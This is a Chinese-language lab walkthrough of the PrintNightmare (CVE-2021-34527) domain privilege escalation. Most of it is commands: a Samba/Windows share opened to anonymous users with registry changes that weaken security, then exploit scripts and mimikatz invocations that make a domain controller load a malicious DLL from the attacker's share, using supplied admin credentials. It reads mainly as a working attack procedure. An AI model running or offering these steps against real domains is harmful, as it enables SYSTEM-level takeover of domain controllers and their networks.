CVE-2021-34527: PrintNightmare 域内提权
-
域控 ip:192.168.72.21,hostname:dc01
-
域内攻击者机器 ip:192.168.72.158,hostname:WIN10-01
-
攻击者 kali 机器 ip:192.168.72.162
如果目标机器开启 Print Spooler 服务,那么此漏洞允许攻击者将代码注入到 Print Spooler 服务的进程 spoolsv.exe 中,以 system 权限执行。
漏洞实验
检测是否开放MS-RPRN服务
python3 rpcdump.py @192.168.72.163 | grep MS-RPRN
linux创建smb服务
目的是为了让目标访问到Evil.dll
修改SMB配置文件/etc/samba/smb.conf: [global] map to guest = Bad User server role = standalone server user share allow guests = yes idmap config* : backend=tdb smb ports=445 [smb] comment=Samba path=/tmp/ guest ok=yes read only=no browsable=yes
启动smb服务
#启动smb服务 service smbd start service smbd status
windows创建smb服务
mkdir C:\share\ icacls C:\share\ /T /grant "ANONYMOUS LOGON":r icacls C:\share\ /T /grant Everyone:r powershell.exe New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone' REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
CVE-2021-1675.py 脚本攻击
python CVE-2021-1675.py HACK.com/administrator:p-0p-0p-0@192.168.72.21 \\192.168.72.158\share\demon.dll python printnightmare.py -dll \\192.168.72.158\share\demon.dll administrator:p-0p-0p-0@192.168.72.21
这里可以看到我的环境下虽然能上传 dll,但是加载不了。
mimikatz攻击
mimikatz.exe "misc::printnightmare /server:192.168.72.163 /library:\\192.168.72.158\share\demon.x64.dll" mimikatz.exe "misc::printnightmare /server:10.211.55.14 /library:\\10.211.55.7\share\1.dll"